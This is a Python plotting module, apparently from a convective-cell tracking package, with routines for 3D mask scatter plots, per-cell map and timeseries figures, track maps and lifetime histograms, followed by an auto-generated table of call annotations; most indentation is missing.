axes.grid(b=False)
axes.set_frame_on(False)
# make the panes transparent
axes.xaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
axes.yaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
axes.zaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
# make the grid lines transparent
axes.xaxis._axinfo["grid"]['color'] = (1,1,1,0)
axes.yaxis._axinfo["grid"]['color'] = (1,1,1,0)
axes.zaxis._axinfo["grid"]['color'] = (1,1,1,0)
if title is not None:
axes.set_title(title,horizontalalignment='left',loc='left')
# colors_mask = ['pink','darkred', 'orange', 'darkred', 'red', 'darkorange']
x = mask_total.coord('projection_x_coordinate').points
y = mask_total.coord('projection_y_coordinate').points
z = mask_total.coord('model_level_number').points
# z = mask_total.coord('geopotential_height').points
zz, yy, xx = np.meshgrid(z, y, x, indexing='ij')
# z_alt = mask_total.coord('geopotential_height').points
# divider = make_axes_locatable(axes)
# if field_filled is not None:
# if levels_field_filled is None:
# levels_field_filled=np.linspace(vmin_field_filled,vmax_field_filled, 10)
# plot_field_filled = axes.contourf(field_filled.coord('projection_x_coordinate').points/1000,
# field_filled.coord('projection_y_coordinate').points/1000,
# field_filled.data,
# levels=levels_field_filled, norm=norm_field_filled,
# cmap=cmap_field_filled, vmin=vmin_field_filled, vmax=vmax_field_filled)
# cax_filled = divider.append_axes("right", size="5%", pad=0.1)
# norm_filled= Normalize(vmin=vmin_field_filled, vmax=vmax_field_filled)
# sm1= plt.cm.ScalarMappable(norm=norm_filled, cmap = plot_field_filled.cmap)
# sm1.set_array([])
# cbar_field_filled = plt.colorbar(sm1, orientation='vertical',cax=cax_filled)
# cbar_field_filled.ax.set_ylabel(label_field_filled)
# cbar_field_filled.set_clim(vmin_field_filled, vmax_field_filled)
# if field_contour is not None:
# if levels_field_contour is None:
# levels_field_contour=np.linspace(vmin_field_contour, vmax_field_contour, 5)
# plot_field_contour = axes.contour(field_contour.coord('projection_x_coordinate').points/1000,
# field_contour.coord('projection_y_coordinate').points/1000,
# field_contour.data,
# cmap=cmap_field_contour,norm=norm_field_contour,
# levels=levels_field_contour,vmin=vmin_field_contour, vmax=vmax_field_contour,
# linewidths=linewidths_contour)
# if contour_labels:
# axes.clabel(plot_field_contour, fontsize=10)
# cax_contour = divider.append_axes("bottom", size="5%", pad=0.1)
# if norm_field_contour:
# vmin_field_contour=None
# vmax_field_contour=None
# norm_contour=norm_field_contour
# else:
# norm_contour= Normalize(vmin=vmin_field_contour, vmax=vmax_field_contour)
#
# sm_contour= plt.cm.ScalarMappable(norm=norm_contour, cmap = plot_field_contour.cmap)
# sm_contour.set_array([])
#
# cbar_field_contour = plt.colorbar(sm_contour, orientation='horizontal',ticks=levels_field_contour,cax=cax_contour)
# cbar_field_contour.ax.set_xlabel(label_field_contour)
# cbar_field_contour.set_clim(vmin_field_contour, vmax_field_contour)
#
for i_row, row in track.iterrows():
cell = row['cell']
feature = row['feature']
# logging.debug("cell: "+ str(row['cell']))
# logging.debug("feature: "+ str(row['feature']))
if cell==cell_i:
color='darkred'
if feature_number:
cell_string=' '+str(int(cell))+' ('+str(int(feature))+')'
else:
cell_string=' '+str(int(cell))
elif np.isnan(cell):
color='gray'
if feature_number:
cell_string=' '+'('+str(int(feature))+')'
else:
cell_string=' '
else:
color='darkorange'
if feature_number:
cell_string=' '+str(int(cell))+' ('+str(int(feature))+')'
else:
cell_string=' '+str(int(cell))
# axes.text(row['projection_x_coordinate']/1000,
# row['projection_y_coordinate']/1000,
# 0,
# cell_string,color=color,fontsize=6, clip_on=True)
# # Plot marker for tracked cell centre as a cross
# axes.plot(row['projection_x_coordinate']/1000,
# row['projection_y_coordinate']/1000,
# 0,
# 'x', color=color,markersize=4)
#Create surface projection of mask for the respective cell and plot it in the right color
# z_coord = 'model_level_number'
# if len(mask_total.shape)==3:
# mask_total_i_surface = mask_features_surface(mask_total, feature, masked=False, z_coord=z_coord)
# elif len(mask_total.shape)==2:
# mask_total_i_surface=mask_features(mask_total, feature, masked=False, z_coord=z_coord)
# axes.contour(mask_total_i_surface.coord('projection_x_coordinate').points/1000,
# mask_total_i_surface.coord('projection_y_coordinate').points/1000,
# 0,
# mask_total_i_surface.data,
# levels=[0, feature], colors=color, linestyles=':',linewidth=1)
mask_feature = mask_total.data == feature
axes.scatter(
# xx[mask_feature]/1000, yy[mask_feature]/1000, zz[mask_feature]/1000,
xx[mask_feature]/1000, yy[mask_feature]/1000, zz[mask_feature],
c=color, marker=',',
s=5,#60000.0 * TWC_i[Mask_particle],
alpha=0.3, cmap='inferno', label=cell_string,rasterized=True)
axes.set_xlim(xlim)
axes.set_ylim(ylim)
axes.set_zlim([0, 100])
# axes.set_zlim([0, 20])
# axes.set_zticks([0, 5,10,15, 20])
axes.set_xlabel('x (km)')
axes.set_ylabel('y (km)')
axes.zaxis.set_rotate_label(False) # disable automatic rotation
# axes.set_zlabel('z (km)', rotation=90)
axes.set_zlabel('model level', rotation=90)
return axes
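# Editor's usage sketch (added for clarity, not part of the original module): plotting a
# single cell in 3D requires an axes with a 3D projection. track_i and mask_i are assumed
# to be the per-timestep track DataFrame and the 3D segmentation mask cube from the
# tracking pipeline; the background fields are passed as None because this routine does
# not currently draw them.
def _example_plot_mask_cell_individual_3Dstatic(track_i, mask_i):
    import matplotlib.pyplot as plt
    fig, ax = plt.subplots(ncols=1, nrows=1, figsize=(10 / 2.54, 10 / 2.54),
                           subplot_kw={'projection': '3d'})
    ax = plot_mask_cell_individual_3Dstatic(cell_i=1,
                                            track=track_i, cog=None, features=None,
                                            mask_total=mask_i,
                                            field_contour=None, field_filled=None,
                                            xlim=[0, 100], ylim=[0, 100],
                                            axes=ax, title='example', ele=10., azim=210.)
    return fig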
def plot_mask_cell_track_static_timeseries(cell,track, cog, features, mask_total,
field_contour, field_filled,
track_variable=None,variable=None,variable_ylabel=None,variable_label=[None],variable_legend=False,variable_color=None,
width=10000,n_extend=1,
name= 'test', plotdir='./',
file_format=['png'],figsize=(20/2.54, 10/2.54),dpi=300,
**kwargs):
    '''Make plots for a single cell in a fixed frame covering its entire development, combining a map view (one background field as filled contours, one as contour lines) with a timeseries of the given track variable(s).
    Input:
    cell (id of the cell), track/cog/features/mask_total and background fields as above, track_variable/variable (DataFrame and column name(s) shown in the timeseries panel)
    Output:
    None; one figure per timestep is written to plotdir/name in the requested file formats
    '''
from iris import Constraint
from numpy import unique
import os
import pandas as pd
track_cell=track[track['cell']==cell]
x_min=track_cell['projection_x_coordinate'].min()-width
x_max=track_cell['projection_x_coordinate'].max()+width
y_min=track_cell['projection_y_coordinate'].min()-width
y_max=track_cell['projection_y_coordinate'].max()+width
time_min=track_cell['time'].min()
# time_max=track_cell['time'].max()
track_variable_cell=track_variable[track_variable['cell']==cell]
track_variable_cell['time_cell']=pd.to_timedelta(track_variable_cell['time_cell'])
# track_variable_cell=track_variable_cell[(track_variable_cell['time']>=time_min) & (track_variable_cell['time']<=time_max)]
#set up looping over time based on mask's time coordinate to allow for one timestep before and after the track
time_coord=mask_total.coord('time')
time=time_coord.units.num2date(time_coord.points)
i_start=max(0,np.where(time==track_cell['time'].values[0])[0][0]-n_extend)
i_end=min(len(time)-1,np.where(time==track_cell['time'].values[-1])[0][0]+n_extend+1)
time_cell=time[slice(i_start,i_end)]
for time_i in time_cell:
constraint_time = Constraint(time=time_i)
constraint_x = Constraint(projection_x_coordinate = lambda cell: x_min < cell < x_max)
constraint_y = Constraint(projection_y_coordinate = lambda cell: y_min < cell < y_max)
constraint = constraint_time & constraint_x & constraint_y
mask_total_i=mask_total.extract(constraint)
if field_contour is None:
field_contour_i=None
else:
field_contour_i=field_contour.extract(constraint)
if field_filled is None:
field_filled_i=None
else:
field_filled_i=field_filled.extract(constraint)
track_i=track[track['time']==time_i]
cells_mask=list(unique(mask_total_i.core_data()))
track_cells=track_i.loc[(track_i['projection_x_coordinate'] > x_min) & (track_i['projection_x_coordinate'] < x_max) & (track_i['projection_y_coordinate'] > y_min) & (track_i['projection_y_coordinate'] < y_max)]
cells_track=list(track_cells['cell'].values)
cells=list(set( cells_mask + cells_track ))
if cell not in cells:
cells.append(cell)
if 0 in cells:
cells.remove(0)
track_i=track_i[track_i['cell'].isin(cells)]
if cog is None:
cog_i=None
else:
cog_i=cog[cog['cell'].isin(cells)]
cog_i=cog_i[cog_i['time']==time_i]
if features is None:
features_i=None
else:
features_i=features[features['time']==time_i]
fig1, ax1 = plt.subplots(ncols=2, nrows=1, figsize=figsize)
fig1.subplots_adjust(left=0.1, bottom=0.15, right=0.90, top=0.85,wspace=0.3)
datestring_stamp = time_i.strftime('%Y-%m-%d %H:%M:%S')
if time_i in track_cell['time'].values:
time_cell_i=track_cell[track_cell['time'].values==time_i]['time_cell']
celltime_stamp = "%02d:%02d:%02d" % (time_cell_i.dt.total_seconds() // 3600,
(time_cell_i.dt.total_seconds() % 3600) // 60,
time_cell_i.dt.total_seconds() % 60 )
else:
celltime_stamp=' - '
title=celltime_stamp + ' , ' + datestring_stamp
datestring_file = time_i.strftime('%Y-%m-%d_%H%M%S')
# plot evolving timeseries of variable to second axis:
ax1[0]=plot_mask_cell_individual_static(cell_i=cell,
track=track_i, cog=cog_i,features=features_i,
mask_total=mask_total_i,
field_contour=field_contour_i, field_filled=field_filled_i,
xlim=[x_min/1000,x_max/1000],ylim=[y_min/1000,y_max/1000],
axes=ax1[0],title=title,**kwargs)
track_variable_past=track_variable_cell[(track_variable_cell['time']>=time_min) & (track_variable_cell['time']<=time_i)]
track_variable_current=track_variable_cell[track_variable_cell['time']==time_i]
if variable_color is None:
variable_color='navy'
if type(variable) is str:
# logging.debug('variable: '+str(variable))
if type(variable_color) is str:
variable_color={variable:variable_color}
variable=[variable]
for i_variable,variable_i in enumerate(variable):
color=variable_color[variable_i]
ax1[1].plot(track_variable_past['time_cell'].dt.total_seconds()/ 60.,track_variable_past[variable_i].values,color=color,linestyle='-',label=variable_label[i_variable])
ax1[1].plot(track_variable_current['time_cell'].dt.total_seconds()/ 60.,track_variable_current[variable_i].values,color=color,marker='o',markersize=4,fillstyle='full')
ax1[1].yaxis.tick_right()
ax1[1].yaxis.set_label_position("right")
ax1[1].set_xlim([0,2*60])
ax1[1].set_xticks(np.arange(0,120,15))
ax1[1].set_ylim([0,max(10,1.25*track_variable_cell[variable].max().max())])
ax1[1].set_xlabel('cell lifetime (min)')
        if variable_ylabel is None:
variable_ylabel=variable
ax1[1].set_ylabel(variable_ylabel)
ax1[1].set_title(title)
# insert legend, if flag is True
if variable_legend:
if (len(variable_label)<5):
ncol=1
else:
ncol=2
ax1[1].legend(loc='upper right', bbox_to_anchor=(1, 1),ncol=ncol,fontsize=8)
out_dir = os.path.join(plotdir, name)
os.makedirs(out_dir, exist_ok=True)
if 'png' in file_format:
savepath_png = os.path.join(out_dir, name + '_' + datestring_file + '.png')
fig1.savefig(savepath_png, dpi=dpi)
logging.debug('Mask static plot saved to ' + savepath_png)
if 'pdf' in file_format:
savepath_pdf = os.path.join(out_dir, name + '_' + datestring_file + '.pdf')
fig1.savefig(savepath_pdf, dpi=dpi)
logging.debug('Mask static plot saved to ' + savepath_pdf)
plt.close()
plt.clf()
def map_tracks(track,axis_extent=None,figsize=(10,10),axes=None):
for cell in track['cell'].dropna().unique():
track_i=track[track['cell']==cell]
axes.plot(track_i['longitude'],track_i['latitude'],'-')
if axis_extent:
axes.set_extent(axis_extent)
axes=make_map(axes)
return axes
def make_map(axes):
import matplotlib.ticker as mticker
import cartopy.crs as ccrs
from cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER
gl = axes.gridlines(crs=ccrs.PlateCarree(), draw_labels=True,
linewidth=2, color='gray', alpha=0.5, linestyle='-')
axes.coastlines('10m')
gl.xlabels_top = False
gl.ylabels_right = False
gl.xlocator = mticker.MaxNLocator(nbins=5,min_n_ticks=3,steps=None)
gl.ylocator = mticker.MaxNLocator(nbins=5,min_n_ticks=3,steps=None)
gl.xformatter = LONGITUDE_FORMATTER
gl.yformatter = LATITUDE_FORMATTER
#gl.xlabel_style = {'size': 15, 'color': 'gray'}
#gl.xlabel_style = {'color': 'red', 'weight': 'bold'}
return axes
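# Editor's usage sketch (added for clarity, not part of the original module): map_tracks and
# make_map expect a cartopy GeoAxes; the tiny synthetic track below is purely illustrative.
def _example_map_tracks():
    import pandas as pd
    import matplotlib.pyplot as plt
    import cartopy.crs as ccrs
    track = pd.DataFrame({'cell': [1, 1, 2, 2],
                          'longitude': [10.0, 10.2, 11.0, 11.1],
                          'latitude': [50.0, 50.1, 50.5, 50.6]})
    fig = plt.figure(figsize=(10, 10))
    ax = fig.add_subplot(1, 1, 1, projection=ccrs.PlateCarree())
    ax = map_tracks(track, axis_extent=[9, 12, 49, 52], axes=ax)
    return fig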
def plot_lifetime_histogram(track,axes=None,bin_edges=np.arange(0,200,20),density=False,**kwargs):
hist, bin_edges,bin_centers = lifetime_histogram(track,bin_edges=bin_edges,density=density)
plot_hist=axes.plot(bin_centers, hist,**kwargs)
return plot_hist
def plot_lifetime_histogram_bar(track,axes=None,bin_edges=np.arange(0,200,20),density=False,width_bar=1,shift=0.5,**kwargs):
hist, bin_edges, bin_centers = lifetime_histogram(track,bin_edges=bin_edges,density=density)
plot_hist=axes.bar(bin_centers+shift,hist,width=width_bar,**kwargs)
return plot_hist
def plot_histogram_cellwise(track,bin_edges,variable,quantity,axes=None,density=False,**kwargs):
hist, bin_edges,bin_centers = histogram_cellwise(track,bin_edges=bin_edges,variable=variable,quantity=quantity,density=density)
plot_hist=axes.plot(bin_centers, hist,**kwargs)
return plot_hist
def plot_histogram_featurewise(Track,bin_edges,variable,axes=None,density=False,**kwargs):
hist, bin_edges, bin_centers = histogram_featurewise(Track,bin_edges=bin_edges,variable=variable,density=density)
plot_hist=axes.plot(bin_centers, hist,**kwargs)
return plot_hist
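# Editor's usage sketch (added for clarity, not part of the original module): the histogram
# helpers draw onto an existing matplotlib axes. `track` is assumed to be a tracked-cells
# DataFrame with the columns expected by lifetime_histogram/histogram_cellwise from this
# package's analysis module; bin edges, bar width and colors are placeholders.
def _example_plot_histograms(track):
    import numpy as np
    import matplotlib.pyplot as plt
    fig, (ax_line, ax_bar) = plt.subplots(ncols=2, nrows=1, figsize=(20 / 2.54, 10 / 2.54))
    plot_lifetime_histogram(track, axes=ax_line,
                            bin_edges=np.arange(0, 200, 20), density=False, color='navy')
    plot_lifetime_histogram_bar(track, axes=ax_bar,
                                bin_edges=np.arange(0, 200, 20), density=False,
                                width_bar=15, shift=0.5, color='navy')
    return fig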
| [((2, 0, 2, 14), 'matplotlib.use', 'mpl.use', ({(2, 8, 2, 13): '"""Agg"""'}, {}), "('Agg')", True, 'import matplotlib as mpl\n'), ((17, 4, 17, 39), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((73, 19, 73, 56), 'matplotlib.ticker.MaxNLocator', 'MaxNLocator', (), '', False, 'from matplotlib.ticker import MaxNLocator\n'), ((83, 10, 83, 102), 'cartopy.feature.NaturalEarthFeature', 'cfeature.NaturalEarthFeature', (), '', True, 'import cartopy.feature as cfeature\n'), ((175, 8, 175, 35), 'matplotlib.pyplot.figure', 'plt.figure', (), '', True, 'import matplotlib.pyplot as plt\n'), ((176, 4, 176, 15), 'matplotlib.pyplot.close', 'plt.close', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((299, 14, 299, 39), 'mpl_toolkits.axes_grid1.make_axes_locatable', 'make_axes_locatable', ({(299, 34, 299, 38): 'axes'}, {}), '(axes)', False, 'from mpl_toolkits.axes_grid1 import make_axes_locatable\n'), ((542, 14, 542, 39), 'mpl_toolkits.axes_grid1.make_axes_locatable', 'make_axes_locatable', ({(542, 34, 542, 38): 'axes'}, {}), '(axes)', False, 'from mpl_toolkits.axes_grid1 import make_axes_locatable\n'), ((952, 17, 952, 52), 'numpy.meshgrid', 'np.meshgrid', (), '', True, 'import numpy as np\n'), ((1109, 37, 1109, 86), 'pandas.to_timedelta', 'pd.to_timedelta', ({(1109, 53, 1109, 85): "track_variable_cell['time_cell']"}, {}), "(track_variable_cell['time_cell'])", True, 'import pandas as pd\n'), ((1249, 18, 1249, 71), 'matplotlib.ticker.MaxNLocator', 'mticker.MaxNLocator', (), '', True, 'import matplotlib.ticker as mticker\n'), ((1250, 18, 1250, 71), 'matplotlib.ticker.MaxNLocator', 'mticker.MaxNLocator', (), '', True, 'import matplotlib.ticker as mticker\n'), ((1257, 54, 1257, 73), 'numpy.arange', 'np.arange', ({(1257, 64, 1257, 65): '(0)', (1257, 66, 1257, 69): '(200)', (1257, 70, 1257, 72): '(20)'}, {}), '(0, 200, 20)', True, 'import numpy as np\n'), ((1262, 58, 1262, 77), 'numpy.arange', 'np.arange', ({(1262, 68, 1262, 69): '(0)', (1262, 70, 1262, 73): '(200)', (1262, 74, 1262, 76): '(20)'}, {}), '(0, 200, 20)', True, 'import numpy as np\n'), ((23, 26, 23, 53), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((33, 8, 33, 44), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((34, 21, 34, 75), 'os.path.join', 'os.path.join', ({(34, 34, 34, 42): 'plot_dir', (34, 43, 34, 74): "name + '_' + datestring_file + '.png'"}, {}), "(plot_dir, name + '_' + datestring_file + '.png')", False, 'import os\n'), ((38, 8, 38, 19), 'matplotlib.pyplot.close', 'plt.close', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((99, 13, 99, 123), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (), '', True, 'import matplotlib.pyplot as plt\n'), ((106, 23, 106, 50), 'matplotlib.ticker.MaxNLocator', 'ticker.MaxNLocator', (), '', False, 'from matplotlib import ticker\n'), ((181, 26, 181, 50), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((214, 26, 214, 54), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((215, 23, 215, 156), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((216, 23, 216, 156), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((247, 20, 247, 67), 'matplotlib.pyplot.subplots', 'plt.subplots', (), '', True, 'import matplotlib.pyplot as plt\n'), ((265, 18, 265, 45), 'os.path.join', 'os.path.join', ({(265, 31, 265, 38): 'plotdir', (265, 40, 265, 44): 'name'}, {}), '(plotdir, name)', False, 'import os\n'), 
((266, 8, 266, 43), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((275, 8, 275, 19), 'matplotlib.pyplot.close', 'plt.close', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((276, 8, 276, 17), 'matplotlib.pyplot.clf', 'plt.clf', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((314, 21, 314, 78), 'matplotlib.colors.Normalize', 'Normalize', (), '', False, 'from matplotlib.colors import Normalize\n'), ((315, 19, 315, 89), 'matplotlib.pyplot.cm.ScalarMappable', 'plt.cm.ScalarMappable', (), '', True, 'import matplotlib.pyplot as plt\n'), ((318, 28, 318, 90), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (), '', True, 'import matplotlib.pyplot as plt\n'), ((347, 20, 347, 92), 'matplotlib.pyplot.cm.ScalarMappable', 'plt.cm.ScalarMappable', (), '', True, 'import matplotlib.pyplot as plt\n'), ((350, 29, 350, 122), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (), '', True, 'import matplotlib.pyplot as plt\n'), ((445, 26, 445, 49), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((447, 23, 447, 94), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((448, 23, 448, 94), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((486, 20, 486, 67), 'matplotlib.pyplot.subplots', 'plt.subplots', (), '', True, 'import matplotlib.pyplot as plt\n'), ((507, 18, 507, 45), 'os.path.join', 'os.path.join', ({(507, 31, 507, 38): 'plotdir', (507, 40, 507, 44): 'name'}, {}), '(plotdir, name)', False, 'import os\n'), ((508, 8, 508, 43), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((517, 8, 517, 19), 'matplotlib.pyplot.close', 'plt.close', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((518, 8, 518, 17), 'matplotlib.pyplot.clf', 'plt.clf', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((556, 21, 556, 78), 'matplotlib.colors.Normalize', 'Normalize', (), '', False, 'from matplotlib.colors import Normalize\n'), ((557, 13, 557, 83), 'matplotlib.pyplot.cm.ScalarMappable', 'plt.cm.ScalarMappable', (), '', True, 'import matplotlib.pyplot as plt\n'), ((560, 28, 560, 84), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (), '', True, 'import matplotlib.pyplot as plt\n'), ((586, 20, 586, 92), 'matplotlib.pyplot.cm.ScalarMappable', 'plt.cm.ScalarMappable', (), '', True, 'import matplotlib.pyplot as plt\n'), ((589, 29, 589, 122), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (), '', True, 'import matplotlib.pyplot as plt\n'), ((704, 26, 704, 49), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((706, 23, 706, 94), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((707, 23, 707, 94), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((745, 13, 745, 56), 'matplotlib.pyplot.figure', 'plt.figure', (), '', True, 'import matplotlib.pyplot as plt\n'), ((749, 14, 749, 58), 'matplotlib.gridspec.GridSpec', 'gridspec.GridSpec', (), '', True, 'import matplotlib.gridspec as gridspec\n'), ((783, 18, 783, 45), 'os.path.join', 'os.path.join', ({(783, 31, 783, 38): 'plotdir', (783, 40, 783, 44): 'name'}, {}), '(plotdir, name)', False, 'import os\n'), ((784, 8, 784, 43), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((793, 8, 793, 19), 'matplotlib.pyplot.close', 'plt.close', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((794, 8, 794, 17), 'matplotlib.pyplot.clf', 'plt.clf', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((830, 26, 830, 
49), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((832, 23, 832, 94), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((833, 23, 833, 94), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((873, 20, 873, 111), 'matplotlib.pyplot.subplots', 'plt.subplots', (), '', True, 'import matplotlib.pyplot as plt\n'), ((894, 18, 894, 45), 'os.path.join', 'os.path.join', ({(894, 31, 894, 38): 'plotdir', (894, 40, 894, 44): 'name'}, {}), '(plotdir, name)', False, 'import os\n'), ((895, 8, 895, 43), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((904, 8, 904, 19), 'matplotlib.pyplot.close', 'plt.close', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((905, 8, 905, 17), 'matplotlib.pyplot.clf', 'plt.clf', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((1120, 26, 1120, 49), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((1121, 23, 1121, 94), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((1122, 23, 1122, 94), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((1159, 20, 1159, 67), 'matplotlib.pyplot.subplots', 'plt.subplots', (), '', True, 'import matplotlib.pyplot as plt\n'), ((1216, 18, 1216, 45), 'os.path.join', 'os.path.join', ({(1216, 31, 1216, 38): 'plotdir', (1216, 40, 1216, 44): 'name'}, {}), '(plotdir, name)', False, 'import os\n'), ((1217, 8, 1217, 43), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((1226, 8, 1226, 19), 'matplotlib.pyplot.close', 'plt.close', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((1227, 8, 1227, 17), 'matplotlib.pyplot.clf', 'plt.clf', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((89, 15, 89, 35), 'numpy.isnan', 'np.isnan', ({(89, 24, 89, 34): 'field.data'}, {}), '(field.data)', True, 'import numpy as np\n'), ((136, 15, 136, 29), 'numpy.isnan', 'np.isnan', ({(136, 24, 136, 28): 'cell'}, {}), '(cell)', True, 'import numpy as np\n'), ((157, 12, 160, 35), 'iris.plot.contour', 'iplt.contour', (), '', True, 'import iris.plot as iplt\n'), ((268, 27, 268, 88), 'os.path.join', 'os.path.join', ({(268, 40, 268, 47): 'out_dir', (268, 49, 268, 87): "name + '_' + datestring_file + '.png'"}, {}), "(out_dir, name + '_' + datestring_file + '.png')", False, 'import os\n'), ((270, 12, 270, 90), 'logging.debug', 'logging.debug', ({(270, 26, 270, 89): "('field_contour field_filled Mask plot saved to ' + savepath_png)"}, {}), "('field_contour field_filled Mask plot saved to ' + savepath_png)", False, 'import logging\n'), ((272, 27, 272, 88), 'os.path.join', 'os.path.join', ({(272, 40, 272, 47): 'out_dir', (272, 49, 272, 87): "name + '_' + datestring_file + '.pdf'"}, {}), "(out_dir, name + '_' + datestring_file + '.pdf')", False, 'import os\n'), ((274, 12, 274, 90), 'logging.debug', 'logging.debug', ({(274, 26, 274, 89): "('field_contour field_filled Mask plot saved to ' + savepath_pdf)"}, {}), "('field_contour field_filled Mask plot saved to ' + savepath_pdf)", False, 'import logging\n'), ((305, 32, 305, 102), 'numpy.linspace', 'np.linspace', ({(305, 44, 305, 61): 'vmin_field_filled', (305, 62, 305, 79): 'vmax_field_filled', (305, 81, 305, 101): 'nlevels_field_filled'}, {}), '(vmin_field_filled, vmax_field_filled, nlevels_field_filled)', True, 'import numpy as np\n'), ((324, 33, 324, 107), 'numpy.linspace', 'np.linspace', ({(324, 45, 324, 63): 'vmin_field_contour', (324, 65, 324, 83): 
'vmax_field_contour', (324, 85, 324, 106): 'nlevels_field_contour'}, {}), '(vmin_field_contour, vmax_field_contour, nlevels_field_contour)', True, 'import numpy as np\n'), ((345, 26, 345, 85), 'matplotlib.colors.Normalize', 'Normalize', (), '', False, 'from matplotlib.colors import Normalize\n'), ((510, 27, 510, 88), 'os.path.join', 'os.path.join', ({(510, 40, 510, 47): 'out_dir', (510, 49, 510, 87): "name + '_' + datestring_file + '.png'"}, {}), "(out_dir, name + '_' + datestring_file + '.png')", False, 'import os\n'), ((512, 12, 512, 70), 'logging.debug', 'logging.debug', ({(512, 26, 512, 69): "('Mask static plot saved to ' + savepath_png)"}, {}), "('Mask static plot saved to ' + savepath_png)", False, 'import logging\n'), ((514, 27, 514, 88), 'os.path.join', 'os.path.join', ({(514, 40, 514, 47): 'out_dir', (514, 49, 514, 87): "name + '_' + datestring_file + '.pdf'"}, {}), "(out_dir, name + '_' + datestring_file + '.pdf')", False, 'import os\n'), ((516, 12, 516, 70), 'logging.debug', 'logging.debug', ({(516, 26, 516, 69): "('Mask static plot saved to ' + savepath_pdf)"}, {}), "('Mask static plot saved to ' + savepath_pdf)", False, 'import logging\n'), ((546, 32, 546, 84), 'numpy.linspace', 'np.linspace', ({(546, 44, 546, 61): 'vmin_field_filled', (546, 62, 546, 79): 'vmax_field_filled', (546, 81, 546, 83): '10'}, {}), '(vmin_field_filled, vmax_field_filled, 10)', True, 'import numpy as np\n'), ((567, 33, 567, 87), 'numpy.linspace', 'np.linspace', ({(567, 45, 567, 63): 'vmin_field_contour', (567, 65, 567, 83): 'vmax_field_contour', (567, 85, 567, 86): '5'}, {}), '(vmin_field_contour, vmax_field_contour, 5)', True, 'import numpy as np\n'), ((584, 26, 584, 85), 'matplotlib.colors.Normalize', 'Normalize', (), '', False, 'from matplotlib.colors import Normalize\n'), ((605, 13, 605, 27), 'numpy.isnan', 'np.isnan', ({(605, 22, 605, 26): 'cell'}, {}), '(cell)', True, 'import numpy as np\n'), ((786, 27, 786, 88), 'os.path.join', 'os.path.join', ({(786, 40, 786, 47): 'out_dir', (786, 49, 786, 87): "name + '_' + datestring_file + '.png'"}, {}), "(out_dir, name + '_' + datestring_file + '.png')", False, 'import os\n'), ((788, 12, 788, 76), 'logging.debug', 'logging.debug', ({(788, 26, 788, 75): "('Mask static 2d/3D plot saved to ' + savepath_png)"}, {}), "('Mask static 2d/3D plot saved to ' + savepath_png)", False, 'import logging\n'), ((790, 27, 790, 88), 'os.path.join', 'os.path.join', ({(790, 40, 790, 47): 'out_dir', (790, 49, 790, 87): "name + '_' + datestring_file + '.pdf'"}, {}), "(out_dir, name + '_' + datestring_file + '.pdf')", False, 'import os\n'), ((792, 12, 792, 76), 'logging.debug', 'logging.debug', ({(792, 26, 792, 75): "('Mask static 2d/3D plot saved to ' + savepath_pdf)"}, {}), "('Mask static 2d/3D plot saved to ' + savepath_pdf)", False, 'import logging\n'), ((897, 27, 897, 88), 'os.path.join', 'os.path.join', ({(897, 40, 897, 47): 'out_dir', (897, 49, 897, 87): "name + '_' + datestring_file + '.png'"}, {}), "(out_dir, name + '_' + datestring_file + '.png')", False, 'import os\n'), ((899, 12, 899, 70), 'logging.debug', 'logging.debug', ({(899, 26, 899, 69): "('Mask static plot saved to ' + savepath_png)"}, {}), "('Mask static plot saved to ' + savepath_png)", False, 'import logging\n'), ((901, 27, 901, 88), 'os.path.join', 'os.path.join', ({(901, 40, 901, 47): 'out_dir', (901, 49, 901, 87): "name + '_' + datestring_file + '.pdf'"}, {}), "(out_dir, name + '_' + datestring_file + '.pdf')", False, 'import os\n'), ((903, 12, 903, 70), 'logging.debug', 'logging.debug', 